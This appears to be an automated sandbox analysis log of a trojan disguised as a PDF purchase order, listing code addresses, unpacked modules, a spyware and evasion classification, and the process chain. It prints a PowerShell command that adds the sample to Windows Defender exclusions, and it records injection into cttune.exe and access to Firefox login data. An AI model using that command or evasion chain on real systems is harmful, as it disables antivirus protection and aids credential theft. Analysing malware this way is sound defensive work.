Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017FF0CC	7_2_017FF0CC
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017570C0	7_2_017570C0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0173D34C	7_2_0173D34C
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0180132D	7_2_0180132D
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0179739A	7_2_0179739A
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017F12ED	7_2_017F12ED
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176B2C0	7_2_0176B2C0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017552A0	7_2_017552A0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017ED5B0	7_2_017ED5B0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01807571	7_2_01807571
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01741460	7_2_01741460
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0180F43F	7_2_0180F43F
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0180F7B0	7_2_0180F7B0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_018016CC	7_2_018016CC
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01759950	7_2_01759950
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176B950	7_2_0176B950
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017E5910	7_2_017E5910
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017BD800	7_2_017BD800
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017538E0	7_2_017538E0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0178DBF9	7_2_0178DBF9
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C5BF0	7_2_017C5BF0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0180FB76	7_2_0180FB76
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176FB80	7_2_0176FB80
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C3A6C	7_2_017C3A6C
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017FDAC6	7_2_017FDAC6
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01807A46	7_2_01807A46
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0180FA49	7_2_0180FA49
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017EDAAC	7_2_017EDAAC
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01795AA0	7_2_01795AA0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01753D40	7_2_01753D40
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176FDC0	7_2_0176FDC0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01801D5A	7_2_01801D5A
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01807D73	7_2_01807D73
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C9C32	7_2_017C9C32
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0180FCF2	7_2_0180FCF2
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0180FFB1	7_2_0180FFB1
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0180FF09	7_2_0180FF09
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01751F92	7_2_01751F92
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01759EB0	7_2_01759EB0
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	Code function: 10_2_04C0D5CD	10_2_04C0D5CD
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	Code function: 10_2_04C04E10	10_2_04C04E10
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	Code function: 10_2_04C04E19	10_2_04C04E19
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	Code function: 10_2_04C0B7C4	10_2_04C0B7C4
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	Code function: 10_2_04C0B7C9	10_2_04C0B7C9
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	Code function: 10_2_04C03049	10_2_04C03049
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	Code function: 10_2_04C05039	10_2_04C05039
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	Code function: 10_2_04C03190	10_2_04C03190
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	Code function: 10_2_04C03199	10_2_04C03199
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	Code function: 10_2_04BF92ED	10_2_04BF92ED
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	Code function: 10_2_04C23B59	10_2_04C23B59
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B2E4F6	11_2_04B2E4F6
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B3F43F	11_2_04B3F43F
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A71460	11_2_04A71460
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B32446	11_2_04B32446
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B1D5B0	11_2_04B1D5B0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B40591	11_2_04B40591
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A80535	11_2_04A80535
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B37571	11_2_04B37571
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A9C6E0	11_2_04A9C6E0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B316CC	11_2_04B316CC
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B3F7B0	11_2_04B3F7B0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A7C7C0	11_2_04A7C7C0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A80770	11_2_04A80770
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AA4750	11_2_04AA4750
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B3F0E0	11_2_04B3F0E0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B370E9	11_2_04B370E9
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A870C0	11_2_04A870C0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B2F0CC	11_2_04B2F0CC
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A8B1B0	11_2_04A8B1B0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B401AA	11_2_04B401AA
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B381CC	11_2_04B381CC
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A70100	11_2_04A70100
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B1A118	11_2_04B1A118
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB516C	11_2_04AB516C
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A6F172	11_2_04A6F172
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B4B16B	11_2_04B4B16B
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A852A0	11_2_04A852A0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B212ED	11_2_04B212ED
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A9B2C0	11_2_04A9B2C0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B20274	11_2_04B20274
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AC739A	11_2_04AC739A
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B403E6	11_2_04B403E6
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A8E3F0	11_2_04A8E3F0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B3132D	11_2_04B3132D
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B3A352	11_2_04B3A352
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A6D34C	11_2_04A6D34C
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B20CB5	11_2_04B20CB5
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B3FCF2	11_2_04B3FCF2
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A70CF2	11_2_04A70CF2
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AF9C32	11_2_04AF9C32
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A80C00	11_2_04A80C00
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A98DBF	11_2_04A98DBF
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A7ADE0	11_2_04A7ADE0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A9FDC0	11_2_04A9FDC0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A8AD00	11_2_04A8AD00
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B37D73	11_2_04B37D73
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A83D40	11_2_04A83D40
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B31D5A	11_2_04B31D5A
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A89EB0	11_2_04A89EB0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B3CE93	11_2_04B3CE93
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A92E90	11_2_04A92E90
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B3EEDB	11_2_04B3EEDB
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B3EE26	11_2_04B3EE26
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A80E59	11_2_04A80E59
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B3FFB1	11_2_04B3FFB1
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A81F92	11_2_04A81F92
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A8CFE0	11_2_04A8CFE0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A72FC8	11_2_04A72FC8
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AC2F28	11_2_04AC2F28
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AA0F30	11_2_04AA0F30
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B3FF09	11_2_04B3FF09
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AF4F40	11_2_04AF4F40
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A668B8	11_2_04A668B8
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A838E0	11_2_04A838E0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AAE8F0	11_2_04AAE8F0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A82840	11_2_04A82840
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A8A840	11_2_04A8A840
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A829A0	11_2_04A829A0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B4A9A6	11_2_04B4A9A6
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A96962	11_2_04A96962
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A89950	11_2_04A89950
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A9B950	11_2_04A9B950
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AC5AA0	11_2_04AC5AA0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B1DAAC	11_2_04B1DAAC
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A7EA80	11_2_04A7EA80
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B2DAC6	11_2_04B2DAC6
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AF3A6C	11_2_04AF3A6C
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B37A46	11_2_04B37A46
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B3FA49	11_2_04B3FA49
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04A9FB80	11_2_04A9FB80
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04ABDBF9	11_2_04ABDBF9
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B36BD7	11_2_04B36BD7
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B3FB76	11_2_04B3FB76
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04B3AB40	11_2_04B3AB40
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_00A81FD0	11_2_00A81FD0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_00A7B0F7	11_2_00A7B0F7
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_00A7D0F0	11_2_00A7D0F0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_00A7B100	11_2_00A7B100
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_00A7B247	11_2_00A7B247
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_00A7B250	11_2_00A7B250
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_00A713A4	11_2_00A713A4
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_00A85690	11_2_00A85690
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_00A83880	11_2_00A83880
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_00A8387B	11_2_00A8387B
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_00A9BC10	11_2_00A9BC10
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_00A7CEC7	11_2_00A7CEC7
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_00A7CED0	11_2_00A7CED0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04D9E5AC	11_2_04D9E5AC
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04D9D678	11_2_04D9D678
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04D9E0F8	11_2_04D9E0F8
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04D9E213	11_2_04D9E213

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: String function: 017CF290 appears 105 times
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: String function: 01797E54 appears 101 times
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: String function: 0173B970 appears 275 times
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: String function: 017BEA12 appears 86 times
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: String function: 01785130 appears 58 times
Source: C:\Windows\SysWOW64\cttune.exe	Code function: String function: 04A6B970 appears 266 times
Source: C:\Windows\SysWOW64\cttune.exe	Code function: String function: 04AEEA12 appears 84 times
Source: C:\Windows\SysWOW64\cttune.exe	Code function: String function: 04AB5130 appears 36 times
Source: C:\Windows\SysWOW64\cttune.exe	Code function: String function: 04AC7E54 appears 88 times
Source: C:\Windows\SysWOW64\cttune.exe	Code function: String function: 04AFF290 appears 105 times

Source: PO-000172483 pdf.exe, 00000000.00000002.2090320439.0000000008FB0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs PO-000172483 pdf.exe
Source: PO-000172483 pdf.exe, 00000000.00000000.2043898245.0000000000122000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameloAp.exe: vs PO-000172483 pdf.exe
Source: PO-000172483 pdf.exe, 00000000.00000002.2082693969.0000000003D95000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs PO-000172483 pdf.exe
Source: PO-000172483 pdf.exe, 00000000.00000002.2091437711.0000000009046000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs PO-000172483 pdf.exe
Source: PO-000172483 pdf.exe, 00000000.00000002.2091437711.0000000009046000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs PO-000172483 pdf.exe
Source: PO-000172483 pdf.exe, 00000000.00000002.2072997076.00000000008BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PO-000172483 pdf.exe
Source: PO-000172483 pdf.exe, 00000000.00000002.2082693969.0000000003DD7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs PO-000172483 pdf.exe
Source: PO-000172483 pdf.exe, 00000000.00000002.2082693969.0000000003DD7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs PO-000172483 pdf.exe
Source: PO-000172483 pdf.exe, 00000000.00000002.2099185789.000000000C920000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs PO-000172483 pdf.exe
Source: PO-000172483 pdf.exe, 00000007.00000002.2611351967.00000000012B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCTTUNE.EXEj% vs PO-000172483 pdf.exe
Source: PO-000172483 pdf.exe, 00000007.00000002.2611864030.000000000183D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PO-000172483 pdf.exe
Source: PO-000172483 pdf.exe	Binary or memory string: OriginalFilenameloAp.exe: vs PO-000172483 pdf.exe

Source: PO-000172483 pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: PO-000172483 pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.PO-000172483 pdf.exe.3dd70b8.4.raw.unpack, DlRvq5yJkomY4LIf3S.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.PO-000172483 pdf.exe.8fb0000.5.raw.unpack, DlRvq5yJkomY4LIf3S.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.PO-000172483 pdf.exe.3db7098.3.raw.unpack, DlRvq5yJkomY4LIf3S.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, RljNRwvexVjjsB76UM.cs	Security API names: _0020.SetAccessControl
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, RljNRwvexVjjsB76UM.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, RljNRwvexVjjsB76UM.cs	Security API names: _0020.AddAccessRule
Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, EkJkBftVd1N6EZjRuG.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, RljNRwvexVjjsB76UM.cs	Security API names: _0020.SetAccessControl
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, RljNRwvexVjjsB76UM.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, RljNRwvexVjjsB76UM.cs	Security API names: _0020.AddAccessRule
Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, RljNRwvexVjjsB76UM.cs	Security API names: _0020.SetAccessControl
Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, RljNRwvexVjjsB76UM.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, RljNRwvexVjjsB76UM.cs	Security API names: _0020.AddAccessRule
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, EkJkBftVd1N6EZjRuG.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, EkJkBftVd1N6EZjRuG.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@15/10@5/3

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO-000172483 pdf.exe.log

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2000:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ughpzhk.nle.ps1

Jump to behavior

Source: PO-000172483 pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PO-000172483 pdf.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: cttune.exe, 0000000B.00000003.2796396336.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000B.00000002.3288581704.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000B.00000002.3288581704.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000B.00000003.2794491097.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PO-000172483 pdf.exe	Virustotal: Detection: 38%
Source: PO-000172483 pdf.exe	ReversingLabs: Detection: 52%

Source: unknown	Process created: C:\Users\user\Desktop\PO-000172483 pdf.exe "C:\Users\user\Desktop\PO-000172483 pdf.exe"
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-000172483 pdf.exe"
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process created: C:\Users\user\Desktop\PO-000172483 pdf.exe "C:\Users\user\Desktop\PO-000172483 pdf.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process created: C:\Users\user\Desktop\PO-000172483 pdf.exe "C:\Users\user\Desktop\PO-000172483 pdf.exe"
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process created: C:\Users\user\Desktop\PO-000172483 pdf.exe "C:\Users\user\Desktop\PO-000172483 pdf.exe"
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	Process created: C:\Windows\SysWOW64\cttune.exe "C:\Windows\SysWOW64\cttune.exe"
Source: C:\Windows\SysWOW64\cttune.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-000172483 pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process created: C:\Users\user\Desktop\PO-000172483 pdf.exe "C:\Users\user\Desktop\PO-000172483 pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process created: C:\Users\user\Desktop\PO-000172483 pdf.exe "C:\Users\user\Desktop\PO-000172483 pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process created: C:\Users\user\Desktop\PO-000172483 pdf.exe "C:\Users\user\Desktop\PO-000172483 pdf.exe"	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	Process created: C:\Windows\SysWOW64\cttune.exe "C:\Windows\SysWOW64\cttune.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
